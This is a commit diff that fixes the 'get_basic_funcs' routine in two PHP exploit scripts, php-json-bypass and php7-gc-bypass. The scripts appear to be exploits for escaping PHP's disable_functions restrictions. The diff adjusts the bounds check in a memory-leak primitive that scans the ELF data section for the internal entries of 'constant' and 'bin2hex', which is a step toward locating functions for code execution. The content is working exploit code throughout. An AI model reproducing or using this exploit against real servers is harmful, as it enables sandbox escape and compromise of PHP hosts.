Fix leaking basic_functions for some builds

Author: mm0r1

php-json-bypass/exploit.php

@@ -91,15 +91,15 @@ public function get_basic_funcs($base, $elf) {
         list($data_addr, $text_size, $data_size) = $elf;
         for($i = 0; $i < $data_size / 8; $i++) {
             $leak = $this->leak2($data_addr, $i * 8);
-            if($leak - $base > 0 && $leak - $base < $text_size) {
+            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                 $deref = $this->leak2($leak);
                 # 'constant' constant check
                 if($deref != 0x746e6174736e6f63)
                     continue;
             } else continue;
 
             $leak = $this->leak2($data_addr, ($i + 4) * 8);
-            if($leak - $base > 0 && $leak - $base < $text_size) {
+            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                 $deref = $this->leak2($leak);
                 # 'bin2hex' constant check
                 if($deref != 0x786568326e6962)

php7-gc-bypass/exploit.php

@@ -86,15 +86,15 @@ function get_basic_funcs($base, $elf) {
         list($data_addr, $text_size, $data_size) = $elf;
         for($i = 0; $i < $data_size / 8; $i++) {
             $leak = leak($data_addr, $i * 8);
-            if($leak - $base > 0 && $leak - $base < $text_size) {
+            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                 $deref = leak($leak);
                 # 'constant' constant check
                 if($deref != 0x746e6174736e6f63)
                     continue;
             } else continue;
 
             $leak = leak($data_addr, ($i + 4) * 8);
-            if($leak - $base > 0 && $leak - $base < $text_size) {
+            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                 $deref = leak($leak);
                 # 'bin2hex' constant check
                 if($deref != 0x786568326e6962)